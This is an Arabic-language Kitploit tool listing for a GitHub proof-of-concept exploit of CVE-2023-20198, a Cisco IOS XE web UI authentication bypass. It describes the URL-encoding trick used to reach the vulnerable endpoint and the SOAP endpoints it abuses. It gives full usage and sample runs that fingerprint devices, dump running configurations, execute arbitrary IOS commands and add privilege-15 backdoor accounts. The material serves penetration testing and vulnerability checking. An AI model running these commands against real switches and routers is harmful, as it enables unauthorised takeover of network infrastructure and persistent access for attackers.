Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Cisco-IOS-XE-CVE-2023-20198 — استغلال PoC لـ CVE-2023-20198 | Kitploit
أدوات/GitHubGitHub/g4sul1n/cisco-ios-xe-cve-2023-20198
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubg4sul1n/cisco-ios-xe-cve-2023-20198

Cisco-IOS-XE-CVE-2023-20198

استغلال PoC لـ CVE-2023-20198

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Cisco-IOS-XE-CVE-2023-20198

استغلال PoC لـ CVE-2023-20198
معلومات الثغرة وطريقة استخدام الاستغلال مقدمة من smokeintheshell (انظر المراجع)
تم تعديل إدارة نقطة النهاية ونوع محتوى HTTP والترويسات من PoCs أخرى موجودة لتعمل في الحالات التي تفشل فيها الاستغلالات الأخرى.

الوصف

تتميز CVE-2023-20198 بتحقق غير سليم من المسار لتجاوز تصفية Nginx للوصول إلى نقطة نهاية الويب webui_wsma_http دون الحاجة إلى مصادقة.
من خلال تجاوز المصادقة إلى نقطة النهاية، يمكن للمهاجم تنفيذ أوامر Cisco IOS عشوائية أو إصدار تغييرات في الإعدادات بصلاحيات Privilege 15.
كشف تحقيق Cisco في الاستغلال النشط للثغرة غير المُعلنة سابقًا أن المهاجمين استغلوا أولاً CVE-2023-20198 لإضافة مستخدم جديد بمستوى Privilege 15. وتضمنت الهجمات الإضافية استغلال CVE-2023-20273 للارتقاء إلى مستخدم root في نظام Linux الأساسي لتسهيل زرع البرامج الضارة.

يستغل هذا الـ PoC ثغرة CVE-2023-20198 للاستفادة من نقطتي نهاية XML SOAP مختلفتين:
تستهدف خيارات فحص الثغرة وجلب الإعدادات وتنفيذ الأوامر نقطة نهاية SOAP cisco:wsma-exec لإدراج الأوامر داخل وسم العنصر execCLI.
يستهدف خيار إضافة مستخدم نقطة نهاية SOAP cisco:wsma-config لإصدار تغيير في الإعدادات وإضافة حساب Privilege 15. يمكن إساءة استخدام نقطة النهاية هذه لإجراء تغييرات إعدادات أخرى، لكن ذلك خارج نطاق هذا الـ PoC.

جاء إساءة استخدام نقطة نهاية SOAP cisco:wsma-exec من قالب nuclei
وجاء إساءة استخدام نقطة نهاية SOAP cisco:wsma-config من PoC الخاص بـ horizon3ai

ملاحظة: لم أُجرِ أيًا من الأبحاث الأصلية أو تطوير الـ PoC لهذه الثغرة. راجع قسم المراجع للاعتماد.

الاستخدام

root@kitploit:~
usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

options:
  -h, --help      show this help message and exit
  -t targetIP     Target IP Address
  -l targetFile   File containing IP Addresses (-c only)
  -https          Use https
  -c              [X] Check for vulnerability
  -g              [X] Get Cisco IOS running config
  -e command      [X] Execute Cisco IOS command
  -a              [X] Add new priv 15 user
  -d              [X] Remove priv 15 user
  -u newUserName  [Optional] user name for -a or -d. Default: G4sul1n
  -p newUserPass  [Optional] new user pass for -a. Default: G4sul1n
  -o outputFile   Write output to file
  -v              Increase verbosity

فحص الثغرة

للتحقق من CVE-2023-20198، سيحاول -c استغلال الثغرة لتنفيذ uname -a
مثال:

root@kitploit:~
# ./exploit.py -t 10.0.0.1 -c

Testing for vulnerability
Target IP:      10.0.0.1
Target URL:     http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Vulnerable:     True
IOS Ver:        <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)

جلب إعدادات Cisco

يقوم الخيار -g بتنفيذ sh run لجلب إعدادات التشغيل الحالية
مثال:

root@kitploit:~
# ./exploit.py -t 10.0.0.1 -g

Building configuration...
Current configuration : 6988 bytes
!
...
!
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
...

تنفيذ الأوامر

يمكن تنفيذ أوامر Cisco IOS عشوائية باستخدام الخيار -e.
يجب توخي الحذر الشديد عند استخدام هذا الخيار لإجراء تغييرات في الإعدادات. لا يوجد تحقق من الإدخال ويتم تطبيق التغييرات فورًا على إعدادات التشغيل الحالية.
مثال:

root@kitploit:~
# ./exploit.py -t 10.0.0.1 -e 'sh log'

Selected Target:        10.0.0.1
Running in Exec Mode
Executing Command:      sh log

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
    Console logging: level debugging, 5368 messages logged, xml disabled,
                     filtering disabled
...

إضافة مستخدم

يمكن استخدام الخيار -a لإنشاء حساب مستخدم جديد بصلاحية Privilege 15، مع إمكانية تحديد اسم الحساب وكلمة المرور عبر -u و-p على التوالي.
مثال:

root@kitploit:~
# ./exploit.py -t 10.0.0.1 -a -u G4sul1n -p G4sul1n

Selected Target:        10.0.0.1
Adding New Privilege 15 User
New User Name:  G4sul1n
New User Pass:  G4sul1n

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

No reportable output from adding users
Check verbose ouput or get running config
Done.

حذف مستخدم

يمكن استخدام الخيار -d لإزالة حساب مستخدم من الجهاز، ويراعي اسم المستخدم المحدد عبر -u.
يجب توخي الحذر للتأكد من أنك لا تحذف حسابًا شرعيًا.
أُضيف هذا للسيناريوهات التي يتعذر فيها الحصول على وصول shell/webui إلى جهاز Cisco تم استغلاله. ولوحظ أن إضافة مستخدم بصلاحية Privilege 15 لا تمنح وصول webui وقد تؤدي إلى ترك آثار استغلال على الأجهزة.

المراجع

استشارة Cisco
بحث horizon3ai حول CVE-2023-20198
PoC من horizon3ai لـ CVE-2023-20198
قالب nuclei لـ CVE-2023-20198 (المؤلفون: iamnoooob, rootxharsh, pdresearch)
PoC من LeakIX لـ CVE-2023-20273
PoC من smokeintheshell لـ CVE-2023-20198

المهام المتبقية

  • دعم https
  • تنفيذ CVE-2023-20273
  • المهلة ومعالجة الأخطاء

إخلاء مسؤولية

الكود الموجود في هذا المشروع مخصص للبحث والاستخدام فقط على الأنظمة التي يحصل فيها المستخدم على إذن صريح.
لا يتحمل مؤلف هذا المشروع أي مسؤولية أو تبعة تجاه إساءة استخدام البرنامج.
استخدمه بمسؤولية ولا تكن شريرًا

تنزيل الأداة